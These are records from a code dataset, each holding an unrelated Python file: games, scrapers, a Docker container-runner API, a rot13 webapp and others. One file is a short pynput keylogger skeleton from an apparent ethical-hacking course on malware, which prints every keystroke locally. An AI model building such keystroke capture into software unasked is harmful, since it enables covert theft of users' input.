self.derrotas+=1\n \n def atualiza_n_tentativas_para_vencer(self,tentativas):\n self.n_tentativas_para_vencer+=tentativas\n \n \n def __str__(self):\n if self.vitorias>0:\n return (f'Nome: {self.name} - Vitórias: {self.vitorias} - Derrotas: {self.derrotas} - Média de tentativa para ganhar {self.n_tentativas_para_vencer/self.vitorias}')\n else:\n return (f'Nome: {self.name} - Vitórias: {self.vitorias} - Derrotas: {self.derrotas}')\n \nclass Jogador_Burro(Jogador):\n def __init__(self,nome):\n \n self.name=nome\n self.vitorias=0\n self.derrotas=0\n self.n_tentativas_para_vencer=0\n self.lista_Vogais=['A', 'I', 'O', 'E', 'U']\n self.lista_Consoantes=['R', 'N', 'C', 'L', 'T', 'M', 'S', 'B', 'G', 'D', 'P', 'H', 'V', 'J', 'F', 'K', 'Q', 'X', 'Z', 'W', 'Y']\n self.lista_letras_jogadas=[]\n \n def tenta_nova_letra(self,lista_letras_jogadas=[]):\n novas_letrar_para_tirar=[]\n \n for letra in lista_letras_jogadas:\n if letra not in self.lista_letras_jogadas:\n self.lista_letras_jogadas.append(letra)\n novas_letrar_para_tirar.append(letra)\n \n for letra in novas_letrar_para_tirar:\n if letra in self.lista_Vogais:\n self.lista_Vogais.remove(letra)\n if letra in self.lista_Consoantes:\n self.lista_Consoantes.remove(letra)\n \n if len(self.lista_Vogais)>0:\n letra_da_vez=self.lista_Vogais[0]\n self.lista_Vogais.remove(letra_da_vez)\n self.lista_letras_jogadas.append(letra_da_vez) \n print(f'\\nSou o robô {self.name}. Após calculos avançadosa letra certa é a vogal {letra_da_vez}')\n time.sleep(2)\n return letra_da_vez\n else:\n if len(self.lista_Consoantes)>0:\n letra_da_vez=self.lista_Consoantes[0]\n self.lista_Consoantes.remove(letra_da_vez)\n self.lista_letras_jogadas.append(letra_da_vez)\n print(f'\\nSou o robô {self.name}. Após calculos avançados a letra certa é a consoante {letra_da_vez}')\n time.sleep(2)\n return letra_da_vez\n else:\n print(f'\\nSou o robô {self.name}. Acabaram minhas letras')\n time.sleep(2)\n \n def reinicia_Robo(self):\n self.lista_Vogais=['A', 'I', 'O', 'E', 'U']\n self.lista_Consoantes=['R', 'N', 'C', 'L', 'T', 'M', 'S', 'B', 'G', 'D', 'P', 'H', 'V', 'J', 'F', 'K', 'Q', 'X', 'Z', 'W', 'Y']\n \n \n def atualiza_vitoria(self):\n self.vitorias+=1\n self.reinicia_Robo()\n \n def atualiza_derrota(self):\n self.derrotas+=1\n self.reinicia_Robo()\n \n \n\nJair=Jogador_Burro('Jair') \n\nfor i in range(26): \n letra=Jair.tenta_nova_letra(['R','W','O','N'])\n\n","sub_path":"robo_burro.py","file_name":"robo_burro.py","file_ext":"py","file_size_in_byte":3810,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"653711995","text":"# Author : Jackson Currie\n# Date : 2015-08-04\n# Description : Startup GUI for console and GUI\n\n# GUI library\nimport tkinter\n\n# Console game\nimport ConsoleGame\n\n# GUI game\nimport GUIGame\n\n# Opens visual game\ndef Visual():\n \n # Close GUI\n root.destroy()\n \n # Run visual game\n GUIGame.GetInputs()\n OpenGUI()\n\n# Runs console game\ndef Console():\n \n # Close GUI\n root.destroy()\n \n # Run console game\n try:\n ConsoleGame.Run()\n except KeyboardInterrupt:\n OpenGUI()\n\n# Run program\ndef OpenGUI():\n \n # Creating GUI\n global root\n root = tkinter.Tk()\n root.geometry(\"600x300+350+100\")\n root.title(\"Take-Away Game\")\n\n # Creating GUI widgets\n consoleGameButton = tkinter.Button(text=\"Play Console Game\", height='3', width='20', command=Console)\n visualGameButton = tkinter.Button(text=\"Play Visual Game\", height='3', width='20', command=Visual)\n # Setting GUI widgets\n visualGameButton.pack(side='right',expand=True)\n consoleGameButton.pack(side='left',expand=True)\n\n # GUI mainloop\n root.mainloop()\n\n# Run program\nOpenGUI()\n","sub_path":"TakeAwayGame - Python/StartScreen.py","file_name":"StartScreen.py","file_ext":"py","file_size_in_byte":1127,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"57637177","text":"import MeCab \nimport sys\nimport argparse\nmecab = MeCab.Tagger(\"Choi\")\n\nclass Vocabulary:\n def __init__(self,filename):\n self.fname = filename\n self.String2i = {}\n self.i2String = []\n if not self.fname is None:\n self.load_vocab()\n def stoi(self, word):\n if word in self.String2i:\n return self.String2i[word]\n return self.String2i['']\n def itos(self, id):\n if id < len(self.i2String):\n return self.i2String[id]\n return ''\n def append_letter(self,word):\n if word in self.String2i:\n return \n self.i2String.append(word)\n id = len(self.String2i) \n self.String2i[word] = id\n def load_vocab(self):\n self.append_letter('None')\n self.append_letter('')\n with open(self.fname,\"r\") as f:\n for line in f:\n line = line[:-3]\n line = str(line)\n node = mecab.parseToNode(line)\n while node:\n self.append_letter(node.surface)\n node = node.next\n def save_Vocab(self,vocabname):\n f = open(vocabname,\"w\")\n for line in self.i2String:\n f.write(line + \"\\n\")\n #### static load method #######\ndef load_from_file(filename):\n vocab = Vocabulary(None)\n with open(filename,\"r\") as f:\n for line in f:\n vocab.append_letter(line)\n return vocab\n \n \n","sub_path":"classification_mecab/dict.py","file_name":"dict.py","file_ext":"py","file_size_in_byte":1481,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"249429","text":"#!/usr/bin/env/ python\n#_*_ coding: utf8 _*_\n\nimport pynput.keyboard\n\ndef presiona(key):\n key1 = convertir(key)\n print(\"Tecla presionada: {}\".format(key1))\n\ndef libera(key):\n key1 = convertir(key)\n print(\"Tecla liberada: {}\".format(key1))\n \n if str(key) == \"Key.esc\":\n print(\"Saliendo...\")\n return False\n\ndef convertir(key):\n if isinstance(key, pynput.keyboard.KeyCode):\n return key.char\n else:\n return str(key)\n\nwith pynput.keyboard.Listener(on_press=presiona, on_release=libera) as listen:\n listen.join()","sub_path":"Udemy/Completado_Master_en_Hacking_con_Python_Vuelvase_un_Hacker_Etico/Seccion_22_Malware_con_Python/117_Creacion_de_Keyloggers_p1_Const_el_esqueleto_Keylogger/keylogger.py","file_name":"keylogger.py","file_ext":"py","file_size_in_byte":561,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"232914494","text":"# import packages/modules\nimport webapp2\nimport codecs\nimport cgi\n\n# creates a form for submitting text to rot13\nform = \"\"\"\n
\n ROT13\n
\n \n
\n
\n \n
\n\"\"\"\n\n\n# method used to escape characters like > < & \"\ndef escape_html(s): \n\treturn cgi.escape(s, quote = True)\n\t\n# used to perform rot13 \ndef rot13(s):\n\treturn codecs.encode(s, 'rot13')\n\n# main handler to do get and post method\nclass MainPage(webapp2.RequestHandler):\n\t# used to write previous form\n\tdef write_form(self, text=\"\"):\n\t\tself.response.out.write(form % {'text' : escape_html(text)})\n \n\t# gets form\n\tdef get(self):\n\t\tself.write_form()\n \n\t# post data to form\n\tdef post(self):\n\t\tuser_text = self.request.get('text')\n\t\tself.write_form(rot13(user_text))\n\n\napplication = webapp2.WSGIApplication([\n ('/', MainPage)\n], debug=True)\n","sub_path":"rot13.py","file_name":"rot13.py","file_ext":"py","file_size_in_byte":954,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"584919421","text":"# penul_3d.py : integrate swing of a pendulum\r\n\r\nfrom pylab import *\r\nfrom mpl_toolkits.mplot3d import Axes3D\r\n\r\n# set initial conditions\r\n\r\ntheta_max=input('starting angle? (in deg) ')\r\ntheta_max = radians(theta_max)\r\nmethod = -1\r\nwhile method != 1 and method != 2 :\r\n method = input('method? (1: Euler, 2: Verlet) ')\r\n\r\nomega_init = 0.0 # start from rest\r\ng_L = 1.0 # constant g/L set =1\r\nL = 1.0\r\ndelta_t = 2.0*pi/100.0 # note period is 2*pi\r\n\r\ntheta=[]\r\nomega=[] # angular velocity\r\ntheta.append(theta_max)\r\nomega.append(omega_init)\r\nt = arange(0.0,9.0*pi,delta_t)\r\n\r\nfor i in range(0,len(t)-1) :\r\n alpha = -g_L * sin(theta[i])\r\n if method == 1 : # Euler's simple method\r\n theta.append(theta[i] + omega[i] * delta_t)\r\n omega.append(omega[i] + alpha * delta_t)\r\n else : # Verlet's method\r\n if i==0 : # first backwards step\r\n theta.append(theta[i] + alpha / 2.0 * delta_t**2)\r\n else :\r\n theta.append(2.0 * theta[i] - theta[i-1] + alpha * delta_t**2)\r\n\r\nx = L * sin(theta)\r\ny = -L * cos(theta)\r\ntheta = degrees(theta)\r\n\r\nfig = figure()\r\nax = fig.gca(projection='3d')\r\nax.plot(t,x,y,lw=2,label='numerical')\r\nax.legend()\r\nxlabel('t')\r\nylabel('x')\r\nax.set_zlabel('y')\r\n#grid('on')\r\nrcParams.update({'font.size': 20})\r\nshow()\r\n\r\n\r\n","sub_path":"Python2/Physics 240/HW6/pendul_3d.py","file_name":"pendul_3d.py","file_ext":"py","file_size_in_byte":1334,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"465899751","text":"import json\nfrom scrapy.exceptions import DropItem\n\nclass LyricsPipeline(object):\n \n def process_item(self, item, spider):\n if item['up']:\n item['lastWeekRank'] = str(int(item['thisWeekRank'])-int(item['up'][1:]))\n return item\n else:\n raise DropItem(\"Song %s does not rise in ranking\" % item)\n\n \nclass JsonWriterPipeline(object):\n \n def open_spider(self, spider):\n self.file = open('processed_data.json','w')\n \n def close_spider(self,spider):\n self.file.close()\n \n def process_item(self, item, spider):\n line = json.dumps(dict(item)) + \"\\n\"\n self.file.write(line)\n return item\n\n\nfrom scrapy.pipelines.images import ImagesPipeline\n\nclass MyImagesPipeline(ImagesPipeline): #Be careful about what to be inherited here!!!\n \n def get_media_requests(self,item,info):\n for url in item['images_urls']:\n yield scrapy.Request(url)\n \n def item_completed(self,results,item,info):\n images_paths = [x['images'] for ok, x in results if ok]\n print(images_paths)\n if not image_paths:\n raise DropItem(\"Song has no cover\")\n item['images'] = image_paths\n return item","sub_path":"tutorial_final/131/lyrics/lyrics/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":1247,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"144671725","text":"import tempfile\nimport unittest\n\nfrom agg import aggregate, split_music, leven_music\n\nclass TestAggregate(unittest.TestCase):\n def test_aggregate(self):\n kyoku_list = ['恋をしよーよ', '観覧車', '仇花', 'タイムマシン']\n #kyoku_list = ['恋をしよーよ']\n actual = aggregate(kyoku_list) \n self.assertEqual(actual, {'恋をしよーよ': 1, 'タイムマシン': 1, '観覧車': 1, '仇花': 1})\n #self.assertEqual(actual, {'恋をしよーよ': 1})\n\n def test_aggregate2(self):\n kyoku_list = ['恋をしよーよ', '観覧車', 'タイムマシン', '仇花', 'タイムマシン']\n actual = aggregate(kyoku_list) \n self.assertEqual(actual, {'恋をしよーよ': 1, 'タイムマシン': 2, '観覧車': 1, '仇花': 1})\n\n def test_aggregate_0(self):\n kyoku_list = []\n actual = aggregate(kyoku_list) \n self.assertEqual(actual, {})\n\n\nclass TestSplitMusic(unittest.TestCase):\n def test_split_music(self):\n with tempfile.NamedTemporaryFile(mode='w') as f:\n f.write(\"\"\"アマオト,Platonic syndrome,二人色\nアマオト,ロケット☆ライド,観覧車\nラムネ,ロケット☆ライド,Welcome☆Berry's\n\"\"\")\n f.flush()\n #actual1, actual2, actual3 = split_music('test_data1.txt')\n actual1, actual2, actual3 = split_music(f.name)\n self.assertEqual(actual1, ['アマオト', 'アマオト', 'ラムネ'])\n self.assertEqual(actual2, ['Platonic syndrome', 'ロケット☆ライド', 'ロケット☆ライド'])\n self.assertEqual(actual3, ['二人色', '観覧車', \"Welcome☆Berry's\"])\n\n\nclass TestLevenMusic(unittest.TestCase):\n def test_leven_music(self):\n music_list1 = {'こいをしよーよ': 1, 'ロケット☆ライド': 1, 'ロケットライド': 1, \"Wlcome Berry's\" :1, '観覧車': 1}\n acutual = leven_music(music_list1)\n self.assertEqual(acutual, {'恋をしよーよ': 1, 'ロケット☆ライド': 2, \"Welcome☆Berry's\": 1, '観覧車': 1})\n\n def test_leven_music_keisan(self):\n music_list1 = {'こいをしよーよ': 1, 'ロケット☆ライド': 3, 'ロケットライド': 1, \"Wlcome Berry's\": 1, '観覧車': 2}\n acutual = leven_music(music_list1)\n self.assertEqual(acutual, {'恋をしよーよ': 1, 'ロケット☆ライド': 4, \"Welcome☆Berry's\": 1, '観覧車': 2})\n\n def test_leven_music_zero(self):\n music_list1 = {'こいをしよーよ': 0, 'ロケット☆ライド': 0, \"Wlcome Berry's\": 0, '観覧車': 0}\n acutual = leven_music(music_list1)\n self.assertEqual(acutual, {'恋をしよーよ': 0, 'ロケット☆ライド': 0, \"Welcome☆Berry's\": 0, '観覧車': 0})\n\n def test_leven_music_list_none(self):\n music_list1 = {'こいをしよーよ': 0, 'ロケット☆ライド': 0, \"Wlcome Berry's\": 0, '観覧車': 0}\n acutual = leven_music(music_list1)\n self.assertEqual(acutual, {'恋をしよーよ': 0, 'ロケット☆ライド': 0, \"Welcome☆Berry's\": 0, '観覧車': 0})","sub_path":"aggregate_duca/tests/test_agg.py","file_name":"test_agg.py","file_ext":"py","file_size_in_byte":3109,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"494260814","text":"# -*- coding: ISO-8859-1 -*-\nimport os\n\n\nclass DiskWalk(object):\n def __init__(self, path):\n self.path = path\n\n def enumerate_path(self):\n path_collection = []\n for dirpath, dirnams, filenames in os.walk(self.path):\n for file in filenames:\n fullpath = os.path.join(dirpath, file)\n path_collection.append(fullpath)\n\n return path_collection\n\n def enumerate_files(self):\n files_collection = []\n for dirpath, dirnames, filenames in os.walk(self.path):\n for file in filenames:\n files_collection.append(file)\n return files_collection\n\n def enumerate_dir(self):\n dirs_collection = []\n for dirpath, dirnames, filenames in os.walk(self.path):\n for dir in dirnames:\n dirs_collection.append(dir)\n return dirs_collection\n\n","sub_path":"directory_walk.py","file_name":"directory_walk.py","file_ext":"py","file_size_in_byte":885,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"303136477","text":"from __future__ import print_function\nimport base64\nimport json\nimport traceback\nimport os\nimport sys\nimport web\nimport api_base\nfrom armada_command.consul.consul import consul_query\nfrom armada_command.docker_utils.images import ArmadaImage\nfrom armada_command.dockyard.alias import INSECURE_REGISTRY_ERROR_MSG\nimport docker_client\n\nsys.path.append(os.path.join(os.path.dirname(os.path.realpath(__file__)), '..'))\n\nLENGTH_OF_SHORT_CONTAINER_ID = 12\n\n\ndef print_err(*objs):\n print(*objs, file=sys.stderr)\n\n\nclass Run(api_base.ApiCommand):\n def run_container(self, image_path, dockyard_user, dockyard_password, dict_ports, dict_environment, dict_volumes,\n run_command):\n exception_msg = \"\"\n try:\n restart_parameters = {'image_path': image_path,\n 'dockyard_user': dockyard_user,\n 'dockyard_password': dockyard_password,\n 'ports': dict_ports,\n 'environment': dict_environment,\n 'volumes': dict_volumes,\n 'run_command': run_command,\n 'microservice_name': dict_environment.get('MICROSERVICE_NAME')\n }\n dict_environment['RESTART_CONTAINER_PARAMETERS'] = base64.b64encode(json.dumps(restart_parameters))\n dict_environment['ARMADA_RUN_COMMAND'] = base64.b64encode(run_command)\n microservice_name = dict_environment.get('MICROSERVICE_NAME')\n\n ports = None\n port_bindings = None\n if dict_ports:\n ports = map(int, dict_ports.values())\n port_bindings = dict((int(port_container), int(port_host))\n for port_host, port_container in dict_ports.iteritems())\n\n environment = None\n if dict_environment:\n environment = dict_environment\n\n volumes = None\n volume_bindings = None\n if dict_volumes:\n volumes = dict_volumes.values()\n volume_bindings = dict(\n (path_host, {'bind': path_container, 'ro': False}) for path_host, path_container in\n dict_volumes.iteritems())\n\n dockyard_address, image_name, image_tag = self._split_image_path(image_path)\n\n docker_api = self._get_docker_api(dockyard_address, dockyard_user, dockyard_password)\n\n self._pull_latest_image(docker_api, image_path, microservice_name)\n\n container_info = docker_api.create_container(microservice_name,\n ports=ports,\n environment=environment,\n volumes=volumes)\n long_container_id = container_info['Id']\n docker_api.start(long_container_id,\n port_bindings=port_bindings,\n publish_all_ports=True,\n privileged=True,\n binds=volume_bindings)\n\n service_endpoints = {}\n agent_self_dict = consul_query('agent/self')\n service_ip = agent_self_dict['Config']['AdvertiseAddr']\n\n docker_inspect = docker_api.inspect_container(long_container_id)\n\n for docker_port, host_address in docker_inspect['NetworkSettings']['Ports'].items():\n service_endpoints['{0}:{1}'.format(service_ip, host_address[0]['HostPort'])] = docker_port\n\n except Exception as e:\n traceback.print_exc()\n exception_msg = e.message + \" Cannot create requested container. {exception_class} - {exception}\".format(\n exception_class=type(e).__name__, exception=str(e))\n return self.status_error(exception_msg)\n\n short_container_id = long_container_id[:LENGTH_OF_SHORT_CONTAINER_ID]\n return self.status_ok({'container_id': short_container_id, 'endpoints': service_endpoints})\n\n def _get_docker_api(self, dockyard_address, dockyard_user, dockyard_password):\n if hasattr(self, '__docker_api') and self.__docker_api:\n return self.__docker_api\n\n docker_api = docker_client.api()\n\n if dockyard_user and dockyard_password:\n logged_in = False\n # Workaround for abrupt changes in docker-py library.\n login_exceptions = []\n registry_endpoints = ['https://{0}/v1/'.format(dockyard_address),\n 'https://{0}'.format(dockyard_address),\n dockyard_address]\n for registry_endpoint in registry_endpoints:\n try:\n docker_api.login(dockyard_user, dockyard_password, registry=registry_endpoint)\n logged_in = True\n break\n except Exception as e:\n login_exceptions.append(e)\n if not logged_in:\n for e in login_exceptions:\n print_err(e)\n raise login_exceptions[0]\n\n self.__docker_api = docker_api\n return docker_api\n\n def _pull_latest_image(self, docker_api, image_path, microservice_name):\n dockyard_address, image_name, image_tag = self._split_image_path(image_path)\n if dockyard_address:\n try:\n docker_client.docker_pull(docker_api, dockyard_address, image_name, image_tag)\n docker_api.tag(dockyard_address + '/' + image_name, microservice_name, tag=image_tag, force=True)\n except Exception as e:\n if \"ping attempt failed\" in str(e):\n raise RuntimeError(INSECURE_REGISTRY_ERROR_MSG.format(header=\"ERROR!\", address=dockyard_address))\n raise\n else:\n docker_api.tag(image_name, microservice_name, tag=image_tag, force=True)\n\n def _split_image_path(self, image_path):\n dockyard_address = None\n image_name = image_path\n image_tag = None\n\n if '/' in image_name:\n dockyard_address, image_name = image_name.split('/', 1)\n if ':' in image_name:\n image_name, image_tag = image_name.split(':', 1)\n\n return dockyard_address, image_name, image_tag\n\n def __prepare_dict_ports(self, post_data):\n ports = {}\n if post_data.get('ports'):\n ports.update(post_data.get('ports'))\n return ports\n\n def __prepare_dict_environment(self, post_data):\n environment = {}\n if post_data.get('environment'):\n environment.update(post_data.get('environment'))\n\n if post_data.get('microservice_name'):\n microservice_name = post_data.get('microservice_name')\n else:\n microservice_name = self._split_image_path(post_data['image_path'])[1]\n\n environment['MICROSERVICE_NAME'] = microservice_name\n return environment\n\n def __prepare_dict_volumes(self, post_data):\n volumes = {}\n if post_data.get('volumes'):\n volumes.update(post_data.get('volumes'))\n\n volumes[docker_client.DOCKER_SOCKET_PATH] = docker_client.DOCKER_SOCKET_PATH\n return volumes\n\n def __prepare_run_command(self, post_data):\n run_command = post_data.get('run_command')\n return run_command\n\n def POST(self):\n image_path, error = self.get_post_parameter('image_path')\n if error:\n return self.status_error(error)\n\n post_data = json.loads(web.data())\n try:\n dockyard_user = post_data.get('dockyard_user')\n dockyard_password = post_data.get('dockyard_password')\n dict_ports = self.__prepare_dict_ports(post_data)\n dict_environment = self.__prepare_dict_environment(post_data)\n dict_volumes = self.__prepare_dict_volumes(post_data)\n run_command = self.__prepare_run_command(post_data)\n except:\n traceback.print_exc()\n return self.status_error('API Run: Invalid input data.')\n\n return self.run_container(image_path, dockyard_user, dockyard_password, dict_ports, dict_environment,\n dict_volumes, run_command)\n","sub_path":"armada_backend/api_run.py","file_name":"api_run.py","file_ext":"py","file_size_in_byte":8356,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"615791110","text":"import urllib\nimport json\nimport datetime\nfrom bs4 import BeautifulSoup\nimport scraperwiki\n\n\ndef date(date):\n\ttry:\n\t\tmonths = dict()\n\t\tmonths = {'Jan': '01', 'Feb': '02', 'Mar': '03', 'Apr': '04', 'May': '05', 'Jun': '06', 'Jul': '07', 'Aug': '08', 'Sep': '09', 'Oct': '10', 'Nov': '11', 'Dec': '12' }\n\t\tliste = date.split(\"-\")\n\t\tdate = liste[2] + \"-\" + months[liste[1]] + \"-\" + liste[0]\n\t\treturn date\n\texcept:\n\t\treturn \" \"\n\ndef formattext(text):\n\tsoup = BeautifulSoup(str(text.encode('utf8')))\n\td = soup.text\n\td.strip(' ')\n\treturn d\n\n\ndef scrap(url):\n\tresponse = urllib.urlopen(url)\n\tliste = json.load(response)\n\tliste = liste[\"datacatalog\"]\n\tid_=0\n\tl=[]\n\tfor li in liste:\n\t\td= {}\n\t\tll = li[\"metatype\"]\n\t\tfor dictio in ll:\n\t\t\td[dictio[\"id\"]]=dictio[\"value\"]\n\t\tl.append(d)\t\n\n\tfor li in l:\t\n\t\ttry:\n\t\t\tname = li[\"name\"]\n\t\texcept:\n\t\t\tname = \"\"\n\n\t\ttry:\n\t\t\tacronym = li[\"acronym\"]\n\t\texcept:\n\t\t\tacronym = \"\"\n\n\t\ttry:\t\n\t\t\tdescription = li[\"description\"]\n\t\texcept:\n\t\t\tdescription = \"\"\n\t\ttry:\n\t\t\turl = li[\"url\"]\n\t\texcept:\n\t\t\turl = \"\"\n\n\t\ttry:\n\t\t\ttype_ = li[\"type_\"]\n\t\texcept:\n\t\t\ttype_ = \"\"\n\n\t\ttry:\n\t\t\tlanguagesupported = li[\"languagesupported\"]\n\t\texcept:\n\t\t\tlanguagesupported = \"\"\n\n\t\ttry:\n\t\t\tperiodacity = li[\"periodacity\"]\n\t\texcept:\n\t\t\tperiodacity = \"\"\n\n\t\ttry:\n\t\t\teconomycoverage = li[\"economycoverage\"]\n\t\texcept:\n\t\t\teconomycoverage =\"\"\n\n\t\ttry:\n\t\t\tgranularity = li[\"granularity\"]\n\t\texcept:\n\t\t\tgranularity =\"\"\n\n\t\ttry:\t\n\t\t\tnumberofeconomies = li[\"numberofeconomies\"]\n\t\texcept:\n\t\t\tnumberofeconomies =\"\"\n\n\t\ttry:\n\t\t\ttopics = li[\"topics\"]\n\t\texcept:\n\t\t\ttopics =\"\"\n\n\t\ttry:\n\t\t\tupdatefrequency = li[\"updatefrequency\"]\n\t\texcept:\n\t\t\tupdatefrequency=\"\"\n\n\t\ttry:\n\t\t\tlastrevisiondate = li[\"lastrevisiondate\"]\n\t\texcept:\n\t\t\tlastrevisiondate=\"\"\n\n\t\ttry:\n\t\t\tcontactdetails = li[\"contactdetails\"]\n\t\texcept:\n\t\t\tcontactdetails=\"\"\n\n\t\ttry:\n\t\t\taccessoption = li[\"accessoption\"]\n\t\texcept:\n\t\t\taccessoption=\"\"\n\n\t\ttry:\n\t\t\tbulkdownload = li[\"bulkdownload\"]\n\t\texcept:\n\t\t\tbulkdownload=\"\"\n\n\t\ttry:\n\t\t\tcite = li[\"cite\"]\n\t\texcept:\n\t\t\tcite=\"\"\n\n\t\ttry:\n\t\t\tdetailpageurl = li[\"detailpageurl\"]\n\t\texcept:\n\t\t\tdetailpageurl=\"\"\n\n\t\ttry:\n\t\t\tcoverage = li[\"coverage\"]\n\t\texcept:\n\t\t\tcoverage=\"\"\n\n\t\ttry:\n\t\t\tmobileapp = li[\"mobileapp\"]\n\t\texcept:\n\t\t\tmobileapp=\"\"\n\n\t\tname = name.encode('ascii','ignore')\n\n\t\tdata ={\"id_\":id_,\\\n\t\t\"Name\": name,\\\n\t\t\"Acronym\":acronym,\\\n\t\t\"Description\":description,\\\n\t\t\"Url\":description,\\\n\t\t\"Type\":type_,\\\n\t\t\"languagesupported\":languagesupported,\\\n\t\t\"periodacity\":periodacity,\\\n\t\t\"economycoverage\":economycoverage,\\\n\t\t\"granularity\":granularity ,\\\n\t\t\"numberofeconomies\":numberofeconomies,\\\n\t\t\"topics\":topics,\\\n\t\t\"updatefrequency\":updatefrequency,\\\n\t\t\"lastrevisiondate\":lastrevisiondate,\\\n\t\t\"date_clean\":date(lastrevisiondate),\\\n\t\t\"contactdetails\":contactdetails,\\\n\t\t\"accessoption\": accessoption,\\\n\t\t\"bulkdownload\":bulkdownload,\\\n\t\t\"cite\":cite,\\\n\t\t\"detailpageurl\":detailpageurl,\\\n\t\t\"coverage\":coverage,\\\n\t\t\"mobileapp\":mobileapp\n\t\t}\t\n\t\tscraperwiki.sqlite.save(unique_keys=['id_'], data = data )\n\t\tid_=id_+1\ndef main():\n\turl=\"http://api.worldbank.org/v2/datacatalog?format=json&per_page=10000\"\n\tscrap(url)\n\nif __name__ == '__main__':\n\tmain()\n","sub_path":"scraper.py","file_name":"scraper.py","file_ext":"py","file_size_in_byte":3100,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"351679346","text":"#\n# @lc app=leetcode.cn id=45 lang=python3\n#\n# [45] 跳跃游戏 II\n#\nfrom typing import *\n# @lc code=start\nclass Solution:\n def jump(self, nums: List[int]) -> int:\n current_pos = 0\n count = 0\n while current_pos != len(nums) - 1:\n max_step = nums[current_pos]\n next_max = -1\n pos_max = -1\n if current_pos + max_step >= len(nums) - 1:\n return count + 1\n for next_pos in range(current_pos+1, \\\n current_pos + max_step + 1):\n if next_pos + nums[next_pos] > next_max:\n next_max = next_pos + nums[next_pos]\n pos_max = next_pos\n current_pos = pos_max\n count += 1\n return count\n# @lc code=end\n\na = Solution()\nprint(a.jump([1,2,1,1,1]))\n\n","sub_path":"45.跳跃游戏-ii.py","file_name":"45.跳跃游戏-ii.py","file_ext":"py","file_size_in_byte":821,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"2008306","text":"from os import listdir, getlogin\n\n\nclass Repository:\n def __init__(self, version):\n \"\"\"\n Constructor:\n '__stats' is a dictionary which contains song names and the elements by which the songs are described.\n '__categories' is a list of words that are allowed to set as categories for the songs.\n \"\"\"\n self.__stats = {}\n self.__categories = [\"tag1\", \"tag2\", \"tag3\", \"tag4\", \"tag5\", \"tag6\", \"tag7\", \"tag8\", \"tag9\", \"tag10\", \"tag11\", \"tag12\", \"tag13\", \"tag14\", \"tag15\", \"tag16\", \"tag17\", \"tag18\", \"tag19\", \"tag20\", \"tag21\", \"tag22\"]\n self.version = version\n\n self.path_global = r\"C:\\Users\\{}\\Music\".format(getlogin())\n self.song_list = []\n\n def searchFiles(self, path):\n \"\"\"Loops through directories within a given path for mp3 files.\"\"\"\n for file in listdir(path):\n if file == \"iTunes\":\n continue\n try:\n self.searchFiles(path+\"\\{}\".format(file))\n except:\n if file.endswith(\".mp3\"):\n self.song_list.append(file)\n\n def getAllStats(self):\n \"\"\"Returns the dictionary of songs and their tags.\"\"\"\n return self.__stats\n\n def getCategories(self):\n \"\"\"Returns the list of possible categories.\"\"\"\n return self.__categories\n\n def loadFile(self, filename):\n \"\"\"Simply loads the resources from a file, filling the dictionary '__stats'.\"\"\"\n self.checker(filename)\n text = ''\n self.__stats.clear()\n try:\n f = open(filename, \"rb\")\n lines = f.readlines()\n for element in lines:\n text = text + str(element.decode(\"utf-8\"))\n f.close()\n for line in text.split(\"\\n\"):\n if line == \"\": continue\n name, element = line.split(\" ##\")\n if name not in self.__stats.keys():\n self.__stats[name] = element\n return \"Loaded \"+filename+\" \"\n except:\n return \"No such file. ERROR \"\n\n def getAllFiles(self):\n \"\"\"Returns a list of file names\"\"\"\n files = []\n [files.append(file) for file in listdir(\".\") if file.endswith(\".file\")]\n # for file in listdir(\".\"):\n # if file.endswith(\".file\"):\n # files.append(file)\n if len(files) == 0:\n f = open(\"Heal.file\", \"w\")\n f.write(\"test ## test\")\n f.close()\n files.append(\"Heal.file\")\n return files\n\n def checker(self, filename):\n \"\"\"Compares the saved file with the music folder\"\"\"\n file_melodies = []\n file_names = []\n my_melodies = []\n self.searchFiles(self.path_global)\n for file in self.song_list:\n file, _ = file.split(\".m\")\n my_melodies.append(file)\n self.song_list.clear()\n f = open(filename, \"rb\")\n lines = f.readlines()\n f.close()\n for line in lines:\n melody = line.decode(\"utf-8\").replace(\"\\n\", \"\")\n file_melodies.append(melody)\n name, _ = melody.split(\" ## \")\n file_names.append(name)\n for mel in file_melodies:\n name, _ = mel.split(\" ## \")\n if name not in my_melodies:\n file_melodies.remove(mel)\n if len(file_melodies) != len(my_melodies):\n for mel in my_melodies:\n if mel not in file_names:\n file_melodies.append(mel + \" ## \")\n file_melodies.sort()\n f = open(filename, \"wb\")\n #f.write(\"test ## test\\n\")\n [f.write((mel + \"\\n\").encode(\"utf-8\")) for mel in file_melodies]\n # for mel in file_melodies:\n # f.write((mel + \"\\n\").encode(\"utf-8\"))\n f.close()\n\n def add(self, title, element):\n \"\"\"\n Simply checks if an element given as parameter is allowed to be set as a tag for the song, which referred by title, then it adds it if valid.\n \"\"\"\n # if element not in self.__categories:\n # return (str(element) + \" is not in categories...\")\n if self.__stats[title] == \" \":\n self.__stats[title] += element\n else:\n self.__stats[title] += (\", \" + element)\n return \"Enter element to add: \"\n\n def replace(self, title, arguments):\n \"\"\"deletes all the argumets then adds the new ones\"\"\"\n self.__stats[title] = \" \"\n for arg in arguments:\n self.add(title, arg)\n\n def save(self):\n \"\"\"\n Saves the information from the dictionary '__stats' into a file named with the version plus Heal.file.\n \"\"\"\n text = ''\n # self.version += 1\n for el in self.__stats:\n if el == \"\": continue\n text += (el + \" ##\" + 